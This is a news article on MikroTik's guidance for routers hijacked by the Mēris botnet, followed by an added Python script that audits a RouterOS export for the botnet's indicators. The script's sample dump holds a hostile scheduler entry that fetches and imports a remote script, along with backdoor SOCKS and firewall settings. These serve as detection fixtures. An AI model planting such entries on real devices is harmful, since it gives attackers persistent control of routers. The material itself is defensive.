MikroTik, the network equipment manufacturer, has given customers advice on how to protect routers that were conscripted into the huge Mēris DDoS botnet over the summer.
"From what we have seen, these attacks use the same routers that were compromised in 2018, when MikroTik RouterOS had a vulnerability, which was quickly fixed," a MikroTik representative told BleepingComputer.
However, the company warned that fixing the vulnerability does not necessarily mean that all routers are secure. If someone obtained the user's password back in 2018, updating alone does not help: the attacker can still log in.
Users must change their passwords, check their firewall to make sure it does not allow remote access from third parties, and look for scripts on the device that they did not create themselves.
Mēris botnet
The Mēris botnet was responsible for two huge DDoS attacks in recent weeks.
The first attack, mitigated by Cloudflare in August, reached 17.2 million requests per second (RPS). The second one exceeded every previous record, reaching 21.8 million RPS against Yandex servers earlier this month.
According to researchers at Qrator Labs, the Mēris botnet, which is derived from the Mirai malware code, currently controls about 250,000 devices, most of them MikroTik network gateways and routers.
How to protect MikroTik routers?
MikroTik advises customers to choose strong passwords so that their devices resist brute-force attacks, and to keep devices up to date so that the vulnerabilities exploited by the Mēris botnet cannot be used against them.
The company advised users to follow these steps to stay safe:
- Keep MikroTik devices (routers etc.) up to date.
- Do not allow anyone to access your device over the Internet. If you need remote access, expose only a secure VPN service.
- Use a strong password. If you already have a strong password but think your device is compromised, change it.
- Do not consider your local network trusted. Malicious software inside the LAN may attempt to connect to your MikroTik router if it has a weak password or no password at all.
- Check the RouterOS configuration for settings you do not recognize.
The settings that the Mēris malware can set when re-configuring compromised MikroTik routers include:
- System -> Scheduler entries that run a fetch script (/tool fetch). Remove them.
- IP -> SOCKS proxy. If you do not use this feature or do not know what it does, turn it off.
- An L2TP client named "lvpn", or any L2TP client that you do not recognize.
- An input firewall rule that allows access to port 5678.
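The checks from both lists above (review the configuration for unknown settings; look for the four specific Mēris artefacts) can be run offline against a saved configuration instead of being clicked through one menu at a time. The script below is an added example and is not code from MikroTik or from the BleepingComputer article. It parses the text that the RouterOS `/export` command produces; the assumed format (a `/path` line opens a section, `add`/`set` lines carry `key=value` pairs, long lines wrap with a trailing backslash) and the SAMPLE_EXPORT dump are constructed for this example and do not come from a real device.

```python
import re

# Constructed sample of a RouterOS "/export" dump (assumption: a "/path"
# line opens a section, "add"/"set" lines carry key=value pairs, and long
# lines wrap with a trailing backslash). Not from a real device. It holds
# each of the four indicators from the list above plus benign entries that
# must not be flagged.
SAMPLE_EXPORT = r"""
# sep/15/2021 10:00:00 by RouterOS 6.48.4
/interface l2tp-client
add connect-to=203.0.113.10 disabled=no name=lvpn user=lvpn
add connect-to=vpn.example.net disabled=no name=office-vpn user=admin
/ip socks
set enabled=yes port=5678
/ip firewall filter
add action=accept chain=input comment="allow established" \
    connection-state=established,related
add action=accept chain=input dst-port=5678 protocol=tcp
add action=accept chain=input dst-port=22,8291 protocol=tcp \
    src-address=192.168.88.0/24
add action=drop chain=input
/system scheduler
add interval=10m name=upd on-event="/tool fetch url=http://203.0.113.10/p.rsc; /import p.rsc" policy=ftp,read,write,policy
add interval=1d name=nightly-backup on-event="/system backup save name=nightly"
"""

# key=value tokens; a value is either a double-quoted string (may contain
# spaces, ';' and escaped quotes) or a run of non-whitespace characters.
KV = re.compile(r'([\w-]+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_export(text):
    """Turn an export dump into a list of (section, verb, params) entries."""
    entries = []
    section = None
    pending = ""  # partial line waiting for its backslash continuation
    for raw in text.splitlines():
        line = raw.strip()
        if pending:
            line = pending + " " + line
            pending = ""
        if line.endswith("\\"):
            pending = line[:-1].rstrip()
            continue
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            section = line
            continue
        verb = line.split(None, 1)[0]
        params = {k: v.strip('"') for k, v in KV.findall(line)}
        entries.append((section, verb, params))
    return entries


def port_in_spec(port, spec):
    """True if `port` is covered by a RouterOS port list like "22,5000-6000"."""
    for part in spec.split(","):
        lo, _, hi = part.partition("-")
        if lo.isdigit() and (hi or lo).isdigit() and int(lo) <= port <= int(hi or lo):
            return True
    return False


def audit(entries):
    """Return (kind, name, detail) findings for the Meris indicators."""
    findings = []
    for section, _verb, p in entries:
        if section == "/system scheduler" and "fetch" in p.get("on-event", ""):
            findings.append(("scheduler", p.get("name", "?"),
                             "scheduler entry runs /tool fetch: " + p["on-event"]))
        elif section == "/ip socks" and p.get("enabled") == "yes":
            findings.append(("socks", "-",
                             "SOCKS proxy enabled on port " + p.get("port", "1080")))
        elif section == "/interface l2tp-client":
            name = p.get("name", "?")
            if name == "lvpn":
                findings.append(("l2tp", name, "L2TP client named lvpn"))
            else:  # not the known name, but the owner must still confirm it
                findings.append(("l2tp-review", name,
                                 "L2TP client to " + p.get("connect-to", "?")
                                 + "; confirm you created it"))
        elif (section == "/ip firewall filter" and p.get("chain") == "input"
              and p.get("action") == "accept"
              and port_in_spec(5678, p.get("dst-port", ""))):
            findings.append(("firewall", "-",
                             "input rule accepts dst-port " + p["dst-port"]))
    return findings


if __name__ == "__main__":
    for kind, name, detail in audit(parse_export(SAMPLE_EXPORT)):
        print(f"[{kind}] {name}: {detail}")
```

To use it on a real device, run `/export file=audit` in the RouterOS terminal, copy the resulting .rsc file off the router and pass its contents to `audit(parse_export(...))`. An L2TP client that is not named lvpn is reported for review rather than as a hit, matching the "that you do not recognize" wording of the list. The firewall check deliberately ignores the protocol and source-address fields, so a rule that accepts port 5678 only from the LAN is reported too and has to be judged by hand.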
MikroTik said it had tried to contact all RouterOS users to inform them about the security issue, but many of them did not respond and did not check their devices. The company said it was looking for other ways to reach them.
"As far as we know at the moment, there are no new vulnerabilities in these devices," the company said.
Source: Bleeping Computer